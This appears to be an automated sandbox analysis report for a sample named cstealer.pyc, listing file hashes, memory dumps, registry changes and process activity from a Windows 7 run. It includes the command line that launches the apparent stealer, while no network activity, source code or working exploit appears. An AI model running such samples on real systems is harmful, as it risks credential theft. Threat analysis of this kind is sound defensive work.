MD5 2991b14b2dd7f0c386c2d50103ab03a0
SHA1 589fdeab9cb62d02bea1fc0d7e372145e8c9d297
SHA256 a888419983a93c2b26240269e2a7f2e444088b1c4ef3edabfc20ba6c35f12e57
SHA512 e22d5c25499bf88b0fbc922de992394e6c8813492fd324897a7f24867f7bc2fb8e366effba898289ada1e1ea94f78642c049c498b5b783db6651e7bc242ace72

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-console-l1-1-0.dll

MD5 6ba1737a03a158ec0fc4974e9b33534b
SHA1 80fc6900f07cbb445f083518cca96c52479758c3
SHA256 bfd94843cfbc732bbb7ef932e5931d77f3c1f2af4aac4c61ea90f60363bc9bd3
SHA512 b7654dce9815efc2d18c5b046a4382b83d20f032b7918cae102a89e1c758b851e3496d8eb2ecc89a850d959095d73b07947a06e3244b0c12ce6b5e01fb881cd2

C:\Users\Admin\AppData\Local\Temp\_MEI28562\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI28562\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI28562\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4960-217-0x0000000005E20000-0x0000000005EB2000-memory.dmp

memory/4960-219-0x0000000005EE0000-0x0000000005EE8000-memory.dmp

memory/4960-218-0x0000000005EB0000-0x0000000005ED6000-memory.dmp

memory/4960-223-0x0000000074F40000-0x00000000756F0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-07 15:58

Reported

2024-05-07 15:59

Platform

win7-20240221-en

Max time kernel

40s

Max time network

17s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pyc C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pyc\ = "pyc_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2008 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2008 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2468 wrote to memory of 2436 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2468 wrote to memory of 2436 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2468 wrote to memory of 2436 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2468 wrote to memory of 2436 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cstealer.pyc"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 9ab6766b0a7e7e16f236b4db10bfa7db
SHA1 15fd98789485b7f0b4f39bf52c8dca3d09281622
SHA256 5ff088b5a40d3484471450604fcc6f1afec1794a6fb2c0ce73feddd41f4f0aec
SHA512 5e5d4eb7a7d1f06fa7ea567d9e8a605f4870f67c46c4cfe52c76348e5cff30e0d6752244be34e8aff5693d2877df185fb4b3a85041f305c61c5d226495d5a653